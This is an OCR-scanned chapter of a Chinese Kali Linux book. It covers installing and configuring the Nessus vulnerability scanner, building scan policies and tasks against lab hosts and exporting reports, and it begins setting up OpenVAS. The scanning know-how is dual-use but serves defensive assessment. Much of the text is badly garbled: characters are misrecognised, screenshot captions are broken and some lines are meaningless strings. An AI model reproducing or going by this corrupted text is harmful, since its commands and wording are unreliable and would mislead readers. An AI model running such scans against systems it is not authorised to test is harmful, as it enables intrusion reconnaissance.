数据 与 目 带 的 漏洞 特征 库 进 行 匹 配 ， 进 而 列举 目标 系统 上 存在 的 安全 漏洞 。 漏 洞 扫 
描 是 保证 系统 和 网 络 安全 必 不 可 少 的 手段 ， 面 对 互联 网 入 侵 ， 如 果 用 户 能 够 根据 上 县 
体 的 应 用 环境 ， 尽 可 能 早 的 通过 网 络 打 描 来 发 现 安全 漏洞 ， 并 及 时 采取 适当 的 处 理 
措施 进行 修补 ， 就 可 以 有 效 地 阻止 入 侵 事 件 的 发 生 。 由 于 该 工作 相对 枯燥 ， 所 以 我 
们 可 以 借助 一 些 便 捷 的 工具 来 实施 ， 如 Nessus 和 OpenVAS。 本 章 将 详细 讲解 这 两 
个 工具 的 使 用 。 


5.1 使 用 Nessus 


Nessus 号 称 是 世界 上 最 流行 的 漏洞 扫 摘 程序 ， 全 世界 有 超过 75000 个 组 织 在 使 用 
它 。 该 工具 提供 完整 的 电脑 漏洞 打手 服务 ， 并 随时 更 新 其 漏洞 数据 库 。Nessus 不 同 
于 传统 的 漏洞 扫 摘 软件 ，Nessus 可 同时 在 本 机 或 远 疹 上 遥控 ， 进 行 系统 的 漏洞 分 析 
打 描 。Nessus 也 是 渗透 测试 重要 工具 之 一 。 所 以 ， 本 章 将 介绍 安 锋 、 配 置 并 局 动 
Nessus。 


5.1.1 安装 和 配置 Nessus 


为 了 定位 在 目标 系统 上 的 漏洞 ，Nessus 依 赖 feeds 的 格式 实现 漏洞 检查 。Nessus 官 
网 提供 了 两 种 版 本 : 家 庭 版 和 专业 版 。 


e 家 庭 版 : 家 庭 版 是 供 非 商业 性 或 个 人 使 用 。 家 庭 版 比较 适合 个 人 使 用 ， 可 以 用 
于 非 专 业 的 环境 。 
e 专业 版 : 专业 版 是 供 商 业 性 使 用 。 它 包括 支持 或 附加 功能 ， 如 无 线 并 发 连接 


`J O 


Ah p EHA Nessusht RERNA CRR. RAAE RA FPR. 
(1) 下 载 Nessus 软 件 包 。Nessus 的 官方 下 载 地 址 


是 http://www.tenable.com/products/ nessus/select-your-operating-system。 在 浏览 


左 中 输入 该 地 址 ， 料 显示 如 图 5.1 所 示 的 界面 。 


| © Download Nessus | Ter x 











€- Cc www.tenable.com/products/nessus/sel your-opera 
i 应 用 如 Google Be [m] 百度 -等 的 访问 出 异 ..， EEF. ced [Jussu 


Download Nessus 
Please Select Your Operating System 


What's New in Nessus 





图 5.1 Nessus FRA 











(2) 在 该 界面 左 侧 的 Download Nessus 下 ， 单 击 Linux， 并 选择 下 载 Nessus-5.2.6- 
debian6 i386.deb 包 ， 如 图 5.2 所 示 。 


Download Nessus 
Please Select Your Operating system 


* Microsoft Windows 


t MacOS X 


* linux 





Debian 6.0 (32 hits): 
Nessus-5 2. 6-debianG6 i386. deb 


Debian 6.0 (64 hits): 
Nessus-5.72.6-debianG6 amd64 deb 


Red Hat ES 4 / CentOS 4: 
Nessus-5.2.6-es4 i386.rom 


Red Hat ES 5 (32 hits) / CentOS 5 / Oracle Linux 5 (including = 


图 5.2 下 载 Linux 系 统 的 Nessus 
(3) 单 击 Nessus-5.2.6-debian6 i386.deb 包 后 ， 将 显示 如 图 5.3 所 示 的 界面 。 





Subscription Agreement 





图 5.3 接收 许可 证 


(4) 在 该 界面 单 击 Agree 按 钮 ， 将 开始 下 载 。 然 后 料 下 载 的 马 ， 保 存 到 目 己 想 要 你 
存 的 位 置 。 


(5) 下 载 完 Nessus 软 件 包 ， 现 在 就 可 以 来 安装 该 工具 。 执 行 命令 如 下 所 示 : 


root@kali:~# dpkg -i Nessus-5.2.6-deblan6_ 1386.deb 
Selecting previously unselected package nessus. 
(正在 读 取 数据 库 .. 系统 当前 共 安 半 有 276380 个 文件 和 目录 。 ) 

正在 解压 缩 nessus (从 Nessus-5.2.6-debian6_i386.deb) .. 
正在 设置 nessus (5.2.6). 

nessusd (Nessus) 5.2.6 [build N25116] for Linux 
Copyright (C) 1998 - 2014 Tenable Network Security, Inc 


Processing the Nessus plugins... 
| VHEHHHHHHHB HH HH HH HH HH HH B BH I B B B BH E BH HH HH HH HH HU HE | 


All plugins loaded 


- You can start nessusd by typing /etc/init.d/nessusd start 
- Then go to https://kali:8834/ to configure your scanner 


看 到 以 上 类 似 的 输出 信息 ， 表 示 Nessus 软 件 包 安 装 成 功 。Nessus 默 认 将 被 安装 
在 /opt/nessus 目录 中 。 


(6) 启动 Nessus。 执 行 命 令 如 下 所 示 : 


root@kali:~# /etc/init.d/nessusd start 
$Starting Nessus : 


从 输出 的 信息 中 可 以 看 到 Nessus 服 务 已 经 启动 。 


注意 : — 必须 有 一 个 注册 码 。 关 于 获取 激活 码 的 方法 在 第 2 章 
已 经 介绍 过 里 就 不 再 其 述 。 


(7) 激活 Nessus。 执 行 命令 如 下 所 示 : 


root@Kali:~# /opt/nessus/bin/nessus-fetch --register 9CC8-19A0-01A， 
fel 





(8) Z Nessus&] £& —/ Fd ^, Tipe RAH : 


root@Kali:~# /opt/nessus/sbin/nessus-adduser 


(9) 登录 Nessus。 在 浏览 器 中 输 入 地 址 https:// 主 机 IP:8834 或 https:// 主 机 
名 :8834。 


通过 以 上 步骤 的 详细 介绍 ，Nessus 就 配置 好 了 ， 现 在 就 可 以 使 用 Nessus 打 描 各 种 
的 漏洞 。 使 用 Nessus 扫 摘 漏 洞 之 前 需要 新 建 扫 摘 筑 略 和 扫 摘 任务 ， 为 了 后 面 能 顺利 
的 扫 摘 各 种 漏洞 ， 接 下 来 将 介绍 新 建筑 略 和 扫 摘 任务 的 方法 。 


1. 添加 策略 
添加 策略 的 上 县 体操 VES 又 如 BATA. 


(1) 登录 Nessus。Nessus 是 一 个 安全 链接 ， 所 以 需要 添加 信任 后 在 
zx 览 右 地 址 栏 中 输入 https:V/1 92.168.41.234:8834/， 将 显示 如 图 5.4 所 示 的 界 
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Untrusted Connection = Iceweasel Tals 
File Edit View History Bookmarks Tools Help 
À Untrusted Connection o | | 中 | 
和 | @ https://192.168.41.234:8834 v ©] | 图 ~ Google a| 


B Most Visited v [Offensive Security Ñ Kali Linux & Kali Docs KliExploit-DB. W Aircrack-ng 

















This Connection is Untrusted 





You have asked Iceweasel to connect securely to 192.168.41.234:8834, 
but we can't confirm that your connection is secure. 





Normally, when you try to connect securely, sites will present trusted 
identification to prove that you are going to the right place. However, this 
site's identity can't be verified. 


What Should | Do? 


If you usually connect to this site without problems, this error could mean 
that someone is trying to impersonate the site, and you shouldn't continue. 


| Get me out of here! | 


== a —— 


* Technical Details 





~ | Understand the Risks 
5.4 连接 不 人 被 信 任 
(2) 在 该 界面 单 击 | Understand the Risks 按 和 钮 ， 将 显示 如 图 5.5 所 示 的 界面 。 
Untrusted Connection - lceweasel 


File Edit View History Bookmarks Tools Help 


A. Untrusted Connection 




















Ez Most Visitedy [Offensive Security "& Kali Linux "& Kali Docs KliExploit-DB W Aircrack-ng 


continue. 


| Get me out of here! | 


* Technical Details 


If you understand what s going on, you can tell Iceweasel to start 
trusting this site's identification. Even if you trust the site, this error 
could mean that someone is tampering with your connection. 


Don't add an exception unless you know there's a good reason why this 
site doesn't use trusted identification. 


Add Exception... | 





5.1 使 用 Nessus 174 
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图 5.5 了 解 风 险 
(3) 该 界面 显示 了 所 存在 的 风险 ， 单 击 Add Exception 按钮， 将 显示 如 图 5.6 所 示 的 
IT Alo 
Add Security Exception | 
You are about to override how Iceweasel identifies this site. 


A Legitimate banks, stores, and other public sites will not 
ask you to do this. 





Server 





Location: | https://192.168.41.234:8834/ Get Certificate 














Certificate Status 


This site attempts to identify itself with invalid 
information. beds 


Wrong 5ite 


Certificate belongs to a different site, which could indicate an 
identity theft. 
Unknown Identity 


Certificate is not trusted, because it hasn't been verified by a 
recognized authority using a secure signature. 





| Permanently store this exception 


Confirm Se Confirm Security Exception Cancel 





图 5.6 添加 安全 例外 
(4) 在 该 界面 单 击 Confirm Security Exception 按钮， 将 显示 如 图 5.7 所 示 的 界面 。 
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F ——— 
Nessus / Login - Iceweasel hsp n we 

File Edit View History Bookmarks Tools Help 
9 Nessus / Login | | | 





@ | à https:/1192.168.41.234:8834/html5.html 


ald & 


[nen Visited sob Security biis Linux eH Docs ERExploit- DB WAircrack-ng 








fiy Nessus 


home 


admin 


e 


Remember Me 


5.7 Nessus 3 RE 











(5) 在 该 界面 输入 前 面 创 建 的 用 户 名 和 密码 ， 然 后 单 击 Sign In 按钮 ， 将 显示 如 图 


5.8 所 示 的 界面 。 








Nessus / Scans - Iceweasel "lax 
File Edit View History Bookmarks Tools Help 
| D Nessus / Scans | | 
€ > |@hipsl270018834htmlshtmliscams Y €] (B: a e^ 





B Most Visited" [Offensive Security “A Kali Linux W Kali Docs. KExploit-DB W Aircrack-ng 








i5 / My Scans 





Ho scans have been generated for This account, You can add a scan by clicking the "New Scan" 
buiten. 


图 5.8 Nessus 主 界面 
(6) 在 该 界面 使 用 鼠标 切换 到 Policies 选 项 卡 上 ， 将 显示 如 图 5.9 所 示 的 界面 。 
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口 
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Nessus / Policies - Iceweasel [一 | | x | 
File Edit View History Bookmarks Tools Help 
Nessus / Policies EJ 


和 和 |ü hrtps/127.0.0.1:8834/Mtm5.htmtë/poticies Y € [B Google a| 业 & 


Ba Most Visited Morfensive Security ^, Kali Lin Linux W Kali Docs 加 Explor- DB Mi Aircrack- k-ng 


Policies 


All Policies 


All Policies | 
No policies have been created. You can add new policies by clicking the "New Policy" button 





E] 5.9 TER A 
(7) 在 该 界面 单 击 New Policy 按 钮 ， 将 显示 如 图 5.10 所 示 的 界面 。 


RN 


Prepare for PCI DSS Audits Offline Config evil 


Policy Wizards 


2 


Mobile Device Scan 














n. 


Advanced Policy 


E 5.10 策略 向 导 


(8) iD FPA GE 6] ETRE XE Nessus 上 默认 支持 10 种 策略 类 型 ， 在 策略 类 型 上 有 
绿色 条 的 表示 订阅 。 这 里 选择 Advanced Policy 类 型 ， 单 击 该 图 标 后 ， 将 显示 如 图 
5.11 所 示 的 界面 。 
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€ Policies Mew Advanced Policy / General Settings / Basic 
General Settings 
ng Setting Type Basic - 
Credentials 
Plugins Hame 


Local Vulnerability Assessmerni 
Pref erenc es 


Visibility 


priv ale - 


Desc niptson 


Allow Past-Scan Repat Editing 本 





图 5.11 新 建 策略 


(9) 在 该 界面 设置 策略 名 、 可 见 性 和 描述 信息 (可 选项 ) 。 这 里 设置 策略 名 为 
Local VulnerabilityAssessment、 可 见 性 为 private。 然 后 单 击 左 侧 的 Plugins 标 签 ， 
将 显示 如 图 5.12 所 示 的 界面 。 在 图 5.11 中 Visibility 有 两 个 选项 。 


Policies Disable Al ^ Enable All Š 
< Policies | un m Plugins Show Enabled 
General Settings Plugin Fami Total status Plugin Name Plugin ID | 


Credentials AIX Local S "oss || Chef aul 48274 
|| 

Plugins Amazon Lin 318 | Default 12513 

Prof ron | | 


Brule tome... en Def aul 24081 




















CentOS Loc... 1660 Det aul .. 4355 


Default .. 48240 





CGI abuses Zu4 





Bac kdoors 97 | | ENABLED | Det aut 65820 










































































CGI abuses 550 Default .. 42388 


Canc al 





— 
一 ik 
i = - 
B E " - a at P 


图 5.12 插件 程序 


e private : 仅 自 己 能 使 用 该 策略 扫描 。 
e shared : 其 他 用 户 也 能 使 用 该 策略 打 描 。 
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(10) 该 界面 显示 了 所 有 插件 程序 ， 黑 认 全 部 是 启动 的 。 在 该 界面 可 以 单 击 
Disable All 按 钮 ， 蔡 用 所 有 饲 动 的 插件 程序 。 然 后 指定 需要 启动 的 插件 程序 ， 如 局 
动 Debian Local Security Checks 和 Default Unix Accounts 插 件 程序 ， 和 启动 后 如 
5.13 所 示 。 


Policies Disable All Enable Ali - i 
¢ Policies Plugins Show Enabled 
= : 
General Sellinas CGI abuses .. 550 | Status Plugin Name Plugin ID 
Credentials Cisco A53 Def aut 48274 
Plugins Databases 345 Dui aul 12513 
——— RES poe = "2 = 
Default Unix Ea Due aul 34081 
Denial of Se 104 Def aul 40:355 
DNS 97 Def aut 46240 
Fedora Loca... 6878 Def aufi 42363 





| Save | Brice 回 
图 5.13 启动 的 插件 程序 
(11) 在 该 界面 单 击 Save 按 钮 ， 将 显示 如 图 5.14 所 示 的 界面 。 


HMessus / Policies = lceveasel 
File Edt View Htory Bookmarks Tools Help 
| O Nessus / Policies | a | 
dà 127.0.0.1 t ~ @) (Be ali @ 


EzMost Veited" forense Security & Kai Linux. ™ Kali Docs. NllExpioit-D8.— M Aircrack-n 
P | 





Policies Unicad 





All Policies 
All Policies Hama = Lem ent Type 
Local Wuinerablg&y Assessment admin Prvala | 


图 5.14 新 建 的 策略 


(12) 从 该 界面 可 以 看 到 新 建 的 策略 Local Vulnerability Assessment， 表 示 该 策略 
已 创建 成 功 。 


2. 新 建 扫 摘 任务 


豆 上 略 创建 成 功 后 ， 必 须要 新 建 扫 朱 任务 才能 实现 漏洞 反 挡 。 下 面 将 介绍 新 建 扫 拍 任 
务 的 具体 操作 步骤 。 


(1) 在 图 5.14 中 ， 将 鼠标 切换 到 Scans 选 项 卡 上 ， 将 显示 如 图 5.15 所 示 的 界面 。 


Nessus / Scans 一 lceweasel 
File Edit View History Bookmarks Tools Help 
| Y Nessus / Scans | 
€ | 昌 https11270018834 ~ € |B ao 


SaMost Visited" Offensive Security “Kali Linux A Kali Docs Kl Exploit-DB.— W Aircrack-ng 

















Scans 本 本 

















My Scans 





Ho scans have been generated for this account. You can add a scan by clicking tha “New Scan" button 











45.15 扫 摘 任务 界面 


(2) 从 该 界面 可 以 看 到 当前 没有 任何 扫 摘 任务 ， 所 以 需要 添加 扫 摘 任务 后 才能 扫 
描 。 在 该 界面 单 击 New Scan 按钮 ， 将 显示 如 图 5.16 所 示 。 


€ Scans Basic Settings 


Basic Settings 


Name sample 5can 
Schedule Setting 
Policy Local Vulnerabilily Asses smen T 
mà | 
F gigg My Scans - 
Targets 192 168.41.0/24 
Upload Targets Add File 





图 5.16 新 建 扫 摘 任务 


(3) 在 该 界面 设置 扫 拉 任务 名 称 、 使 用 策略 、 文 件 夹 和 扫描 的 目标 。 这 里 分 别 设 
置 为 Sample Scan, Local Vulnerability Assessment (前 面 新 建 的 策略 ) 、My 
Scans 和 192.168.41.0/24。 然 后 单 击 Launch 按 钮 ， 将 显示 如 图 5.17 所 示 的 界面 。 


Nessus / Scans 一 lceweasel 
File Edit View History Bookmarks Tools Help 
| J Nessus / Scans | d | 
4 [à 1/127.0.0.1:8834/ht mi | «Q B q 


B Most Visited" (Offensive Security "& Kali Linux ™W Kali Docs MExploit-DB MW Aircrack-ng 






































My Scans 





My Scans m "ame 


Sample Scan C) Running 


























E] 5.17 运行 扫 摘 任务 

(4) 从 该 界面 可 以 看 到 扫描 任务 的 状态 为 Running 〈 正 在 运行 ) ， 表 示 Sample 
Scan 打 描 任务 添加 成 功 。 如 果 想 要 停止 扫描， 可 以 单 击 〈 停 止 一 下 ) 按钮 。 如 
RYSARE, ži “按钮 。 


5.1.2 扫 持 本 地 漏 酒 


在 表面 介绍 了 Nessus 的 安 委 、 配 置 、 登 录 太 新 建筑 略 和 扫 摘 任务 ， 现 在 可 以 开始 第 
一 次 测试 组 的 安全 漏洞 。 对 于 新 建筑 略 和 扫 拍 任务 这 里 融 不 再 资 述 ， 本 小 节 中 只 列 
出 扫 摘 本 地 漏洞 所 需 添 加 的 插件 程序 及 分 析 扫 摘 信 息 。 


【实例 5-1】 扫描 本 地 漏洞 具体 操作 步骤 如 下 所 示 。 
(1) 新 建 名 为 Local Vulnerability Assessment ig. 


(2) 添加 所 需 的 插件 程序 。 


e Ubuntu Local Security Checks : 扫 摘 本 地 Ubuntu 安全 检查 。 
e Default Unix Accounts : 扫描 默认 Unix 账 户 。 


(3) 新 建 名 为 Sample Scan 扫 拍 任务 。 
(4) 扫 摘 漏洞 。 扫 摘 任 务 执行 完成 后 ， 将 显示 如 图 5.18 所 示 的 界面 。 


Nessus Scans = leewearel 
Fae Ect Werw Hitay Bookmarks Tools Help 
| O3 Nessus / Scans | ug | 


* à 127.0.0.1 ~@ p- a i ^" 


BpMost Vaited" (offensive Security '& Kali Linux. '& Kali Does. Kfiexplot-DB.— W Aircrack-ng 


My Scans 


AST pee = 





Gela cc an April 24, 2014 15:53 04 Compara 


图 5.18 扫 摘 完成 


(5) 在 该 界面 双击 扫描 任务 名 称 Sample Scan， 将 显示 扫描 的 详细 信息 ， 如 图 
5.19 所 示 。 


sample Scan Export = Audit Trail = 
Scans » Hosts a Vulnerabiisitias Hide Delails 
Host Vulnerabililies «4 Scan Details 
m zs Folder My Scans 
192 1858.41.24 Sa Status cer pal eet ed 
Policy Local Vulnerability Assessment 
192.168.41.235 E Targets: — 192168 41.0/24 


Start timi Thu Apr 24 15:03:49 2014 
Emi tima: Thu Apr 24 15:08:08 2014 
Elaps e 4 painless 


Vulnerabilities 


EESE 
pE 





图 5.19 扫 摘 的 详细 信息 


(6) 从 该 界面 可 以 看 到 总 共 扫 描 了 三 台 主 机 。 扫 拉 主 机 的 漏洞 情况 ， 可 以 查看 
Vulnerability, ROUEN A HARI PUER acne 
息 ， de 状态 、 策 略 、 目 标 主 机 和 时 间 等 。 右 下 角 以 圆 形 图 显示 了 漏 
洞 的 危险 情 别 使 用 不 同 颜色 显示 漏洞 的 严重 性 。 本 机 几乎 没 任何 漏洞 ， 
显示 是 蓝 色 a 关于 漏洞 的 信息 使 用 在 该 界面 可 以 单 击 Host 列 中 的 任何 一 

地 址 ， 显示 该 主机 的 详细 信息 ， 包括 IP 地 址 、 操 作 系 统 类 型 、 打 描 的 起 始 M RIA 
束 时 间 等 。 本 例 中 选择 192.168.41.234 地 址 ， 如 图 5.20 所 示 。 





Sample Scan Exod + Audit Tre 


Hosts > 182168412734 > Vulnerabilities a, Hide Cael ails 
Severity = Plugin Name Oui Host Details 
CS Linux Kamel ;3.712-kali1 -AB65-pae 


Stan dime Thu Apr 24 15:04:43 2014 
End afirma [hu Apr z3 15:04:57, z014 
KB LT 


图 5.20 漏洞 信息 
(7) 在 该 界面 单 击 INFO 按 钮 ， REX 示 具 体 的 漏洞 信息 ， 如 图 5.21 所 示 。 


A 
nelstal portscanner (SSH) « Plugin Details | 
| Severity inig 
Description 
ic 14272 
This plugin runs ‘netstat’ on ihe remote machine to @numerale open ports Version 1 57 
Type remota 
Sees [he seclion péugins options’ ta configure il i 
Family Pont scanners 
ET ate ae 6 
Output Modif ied 2012/10030 
F t BB dp a" Fourie p.d | pe 
Risk information 
Port * Has là 
Risk Factor Mone 
ii udip 192 16, 41 ZA 
k t BEP4/ toy 1 be ope 
Fort ¥ Haa ba 
89:34. kc p ew 192 1568,41,:224 
Port 15774/udj | to be ol 
回 


图 5.21 漏洞 详细 信息 


(8) 该 界面 显示 了 漏洞 的 描述 言 息 及 扫 摘 到 的 信息 。 人 例如， 该 主机 上 开启 了 68、 
88344115774 um Ll, 使 用 Nessus 还 可 以 通过 导出 文件 的 方式 查看 漏洞 信息 ， & Hy 
的 文件 格式 包括 Nessus、PDF、HTML、CSV 和 Nessus DB, 导出 文件 的 方式 如 下 
BER : 


在 图 5.20 中 单 击 Export 按 钮 ， 选 择 导 出 文件 的 格式 。 这 里 选择 PDF 格式 ， 单 击 PDF 
命令 ， 将 显示 如 图 5.22 所 示 的 界面 。 


PDF Chapter Selection 


Avallable Content Report Content 
Drag and organize content here. 


Hosts Summary (Executive) 


Vulnerabilities By Host 


Vulnerabilities By Plugin 


E 5.22 可 用 的 内 容 


(9) 该 界面 分 为 两 部 分 ， 包 括 Available Content (可 用 的 内 容 ) 和 Report 
Content (REAR) 。 该 界面 显示 了 导出 的 PDF 文件 中 可 包括 的 内 容 有 主机 摘要 
言 息 、 主机 漏洞 和 插件 漏洞 。 在 图 5.22 中 将 要 导出 的 内 容 用 鼠标 拖 到 Report 
Content 框 中 ， 拖 和 人 内容 后 将 显示 如 图 5.23 所 示 的 界面 。 





| PDF Chapter Selection 


Available Content Report Content 


Vulnerabilities By Host Hosis Summary (Executive) 


Vulnerabilities By Plugin 


Export 








25.23 导出 的 内 容 


(10) 在 该 界面 显示 了 将 要 导出 的 内 容 。 此 时 单 击 Export 按 钮 ， 将 显示 如 图 5.24 所 
示 的 界面 。 


Opening Sample-Scan-pme3e2.pdf 
You have chosen to open: 
_| Sample-S5can-pme3e2.pdf 


which is a: PDF 文档 (23.6 KB) 
from: https://127.0.0.1:8834 


Would you like to save this file? 


Cancel Save File 


图 5.24 下 载 界面 
(11) 在 该 界面 单 击 Save File 按 钮 ， 指 定 该 文件 的 保存 位 置 ， 即 PDF 文件 导出 友 


功 。 
5.1.3 扫 摘 网 2% pil 


如 果 用 户 想 要 使 用 Nessus 攻 击 SM 围 的 漏洞 ， 需 要 配置 评估 漏洞 列表 并 指定 获 
取信 县 的 评估 列表 。 本 小 节 T 和 料 介 绍 配置 Nessus 在 = Heise pet 2-188 718] , iX 这 些 漏 洞 
指 目标 主机 或 其 他 网 络 协 议 。 


【实例 5-2】 扫描 网 络 漏洞 的 具体 操作 步骤 如 下 所 示 。 
(1) 新 建 名 为 Internal Network Scan 策略 。 

(2) 添加 所 需 的 插件 程序 ， 如 表 5-1 所 示 。 

表 5-1 所 需 插件 程序 


CISCO 扫 摘 CISCO 系 统 


DNS 扫 摘 DNS 服务 器 

Default Unix Accounts 扫 摘 本 地 默认 用 户 账 户 和 密码 
FTP 4a HF TPAR 4-28 

Firewalls id VERS As 

Gain a shell remotely iiu fe 35 Bx ByShell 
Geeral 扫描 常用 的 服务 

Netware 扫 摘 网 络 操作 系统 
Peer-To-Peer File Sharing 扫 摘 共事 文件 检测 

Policy Compliance 扫描 PCIl DSS 和 SCAP 信 息 
SCADA 扫 拍 设置 管理 工具 

SMTP Problems 扫 摘 SMTP 问 题 

SNMP 打 描 SNMP 相 关 信 息 
Service Detection 扫 拍 服务 侦察 

Settings 打手 基本 设置 


(3) 新 建 名 为 Network Scan 扫描 任务 。 
(4) 扫 摘 结果 如 图 5.25 所 示 。 


Network Scan Export = Audit Trail : 
Hosts > 192.168.41.1 > Vulnerabilities ER Hide Details 
Severity a Plugin Name Coun Host Details 
| MEDI SSL Canificate Cannot Be Trusted 1 IP 182 1868.41.1 
DHE lac alhicsl 
EU SS sot-signed Certificate MAC 00:50: 56:c0: 00:08 
oS Microsolt Veimdows 7 Ultimate 
| MFO Nessus SYN canna 7 Start time Fr Apr 25 13:37:33 2014 
End tima Fr Apr z5 13:39:15 2014 
| Fo | Viiware ESX 5X Seve did aclion 
Vulnerabilities 
ELTE Common Platform Enumeration (CPE) 


45.25 网 络 扫 摘 结果 


(5) 从 该 春 面 可 以 看 到 有 两 个 比较 严重 的 漏洞 。 如 果 力 要 详细 地 分 析 该 漏洞 ， 建 
议 料 该 信息 使 用 文件 的 形式 导出 。 


5.1.4 扫描 指定 Linux 的 系统 漏洞 
本 小 节 将 介绍 使 用 Nessus 扫 描 指 定 Linux 系 统 上 的 漏洞 。 
【实例 5-3】 扫 摘 指定 Linux 系 统 漏 洞 的 具体 操作 步骤 如 下 所 示 。 


(1) 使 用 Metasploitable 2.0 作 为 目标 主机 。 用 户 也 可 以 使 用 其 他 版 本 的 Linux 系 
Zo 


(2) 新 建 名 为 Linux Vulnerability Scan 策略 。 
(3) 添加 所 需 的 插件 程序 ， 如 表 5-2 所 示 。 
表 5-2 所 需 插 件 程序 


Backdoors 

Brute Force Attacks 

CentOSo Local Security Checks 
DNS 

Debian Local Security Checks 
Default Unix Accounts 

Denial of Service 

FTP 

Fedora Local Security Checks 
Firewalls 

FreeBSD Local Security Checks 
Gain a shell remotely 

General 

Gentoo Local Security Checks 
HP-UX Local Security Checks 
Mandriva Local Security Checks 
Misc 

Red Hat Local Security Checks 
SMTP Porblems 

SNMP 


Scientific Linux Local Security 
Checks 


Slackware Local Security Checks 


Solaris Local Security Checks 
SUSE Local Security Checks 
Ubuntu Local Security Checks 


Web Servers 


扫 摘 秘密 信息 


INH 

打 摘 CentOS 系 统 的 本 地 安全 漏洞 
扫 摘 DNS 服务 器 

扫 朱 Debian 系统 的 本 地 安全 漏洞 
打 描 默认 Unix 用 户 账号 

扫 摘 拒绝 的 服务 

打 接 FTP 服 务 器 

扫 扩 Fedora 系 统 的 本 地 安全 漏洞 
扫 朱 防火 墙 


扫 摘 FreeBSD 系 统 的 本 地 安全 漏洞 
扫 摘 远程 获得 的 Shel| 


扫 搞 Gentoo 系 统 的 本 地 安全 漏洞 

扫 搞 HP-UX 系 统 的 本 地 安全 漏洞 

扫 摘 Mandriva 系 统 的 本 地 安全 漏洞 
打手 复杂 的 漏洞 

datmRed Hat 系 统 的 本 地 安全 漏洞 

3 摘 SMTP 问 题 

扫描 SNMP 漏 洞 

扫描 Scientific Linux 和 有 系统 的 本 地 安全 漏 


扫 摘 Slackware 系统 的 本 地 安全 漏洞 
3 摘 Solaris 系 统 的 本 地 安全 漏洞 

扫 摘 SuSE 系 统 的 本 地 安全 漏洞 

扫 搞 Ubuntu 系统 的 本 地 安全 漏洞 
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v 
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(4) 新 建 名 为 Linux Vulnerability Scan 扫描 任务 。 


(5) 扫 拍 漏洞 ， 扫 摘 结 果 如 图 5.26 所 示 。 


Linux Vulnera... Expod = Audit Trail 











Scans > Hosts Eg í uinerabxliie: 
Hast Vulnerabiilies = Scan Details 

02 168.41.254 Mam Linum lerabe 3 

Fold My Si 
188.41 NE Sta Completed 

Policy Liriux arg bli 

B2 1568.41.23 p o» | Target 182.158.41.0/24 
Start time FA Apr 25 14: 06 30 2014 
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图 5.26 指定 Linux 系 统 打 描 结果 


(6) 从 该 界面 可 以 看 到 总 共 打 描 了 6 台 主 机 上 的 漏洞 信息 。 其 中 ， 主 机 

cor se bas eee ie AME 关于 漏洞 的 百分比 情况 ， 可 以 从 右 下 
BIRINE TESI 同样 ， 用 户 可 以 使 用 前 面 介 绍 过 的 两 种 方法 ， 查 看 漏洞 的 详 
细 信 息 。 


5.1.5 打 描 指定 Windows 的 系统 漏洞 


本 节 将 介绍 使 用 Nessus 扫 摘 指 定 Windows 系 统 上 的 漏洞 。 


【实例 5-4】 使 用 Nessus 扫 描 指 定 Windows 系 统 漏洞 。 本 例 中 使 用 Windows 7 系统 
作为 目标 主机 。 具 体 扫 拉 步骤 如 下 所 示 。 


(1) 新 建 名 为 Windows Vulnerability Scan 策略 。 
(2) 添加 所 需 的 插件 程序 ， 如 表 5-3 所 示 。 
表 5-3 所 需 插件 程序 


DNS 1338 DNSBR 4-28 
Databases 13 TEUER 

Denial of Service i3T81RA56 ARF 
FIP ta tHFTPARA 2s 


SMTP Problems 44 tH SMTP je] 35 

SNMP 扫 折 SNMP 

Settings 扫 拍 设置 信息 

Web Servers 打 描 Web Servers 
Windows 扫 摘 Windows 
Windows:Microsoft Bulletins 扫 折 Windows 中 微软 公告 
Windows:User management 扫描 Windows 用 户 管理 


(3) 开始 扫描 漏洞 。 扫 描 结 果 如 图 5.27 所 示 。 


Nessus / Scans / Hosts = lcoweasel 


File Edt View History Bookmarks Tools Help 


| D Nessus / Scans / Hosts | | 
# à 127.0.0.1 “E| | 图 ~ ajl 4 f? 
Ba Most Visited" Biloffensive Security “A Kali Linux 全 Kali Docs QExploit-D8 W Aircrack-ng 
Windows Vul... Expot ™ Audit Trail ~ 
Scans » Hosts m Vulnerabt jes Hide Detail 
Host vulnerabilities = Scan Detalls 
— NEENCENENNN 0n e ee se 
F cider My Scans 
Status Completed 
Policy Windows Vulnerabity Scan 


Tangels 192 188. 41.1 
Star time Fi Apr 25 14:09:15 2014 
Ere ims Fr Ag 75 14:10:52 2014 


Elaps ad £ minutes 


E 5.27 扫 摘 Windows 和 有 系统 的 结 

(4) 从 该 界面 可 以 看 到 主机 192.168.41.1 的 漏洞 情况 ， 该 主机 中 存在 一 个 比较 严重 
的 漏洞 。 同 样 用 户 可 以 使 用 前 面 介 绍 过 的 两 种 方法 查看 漏洞 的 详细 信息 ， 进 而 修改 
主机 中 存在 的 漏洞 。 


5.2 使 用 OpenVAS 


OpenVAS (开放 式 漏 洞 评估 系统 ) 是 一 个 客户 亲 / 服 务 器 架构 ， 它 党 用 来 评估 目标 
主机 上 的 漏洞 。OpenVAS 是 Nessus 项 目的 一 个 分 支 ， 它 提供 的 产品 是 完全 地 免 
i, OpenVAS 默 认 安 装 在 标准 的 Kali Linux 上 ， 本 节 将 介绍 配置 及 启动 OpenVAS。 


5.2.1 fc i OpenVAS 


OpenVAS 上 默认 在 Kali LinuxFR Eze Ze, URESAALS, ARRA E 
置 。 配 置 OpenVAS 具 体操 作 步 又 如 下 所 示 。 


(1) 在 终端 窗口 中 切换 到 OpenVAS 上 目录， 为 OpenVAS 程 序 创 建 SSL 证 书 。 执 行 命 
DUFFI : 


root@kali:~# cd /usr/share/openvas/ 
root@kali:/usr/share/openvas# openvas-mkcert 


执行 以 上 命 侈 后 ， 将 输出 如 下 所 示 的 信息 : 


Creation of the OpenVAS SoL Certificate 


This script will now ask you the relevant information to create the SSL certificate of OpenVAS. 
Note that this information will «NOT* be sent to anybody (everything stays local), but anyone with 
the ability to connect to your OpenVAS daemon will be able to retrieve this information. 


CA certificate life time in days [1460]: # 设 置 CA 证 书 有 效 时 间 
Server certificate life time in days [365]: Hig BH E uE-B SX i8] 
Your country (two letter code) [DE]: # 设 置 国家 

Your state or province name [none]: # 设 置 州 或 省 份 

Your location (e.g. town) [Berlin]: # 设 置 城市 

Your organization [OpenVAS Users United]: # 设 置 组 织 


以 上 提示 的 信息 ， 可 以 配置 也 可 以 不 配置 。 如 果 不 想 配置 的 话 ， 下 搂 按 下 Enter 键 搂 
JA 默认 值 即 可 。 以 上 信息 设置 完 后 ， 将 显示 以 下 信息 : 


Congratulations. Your server certificate was properly created. 
The following files were created: 
. Certification authority: 

Certificate /var/lib/openvas/CA/cacert.pem 

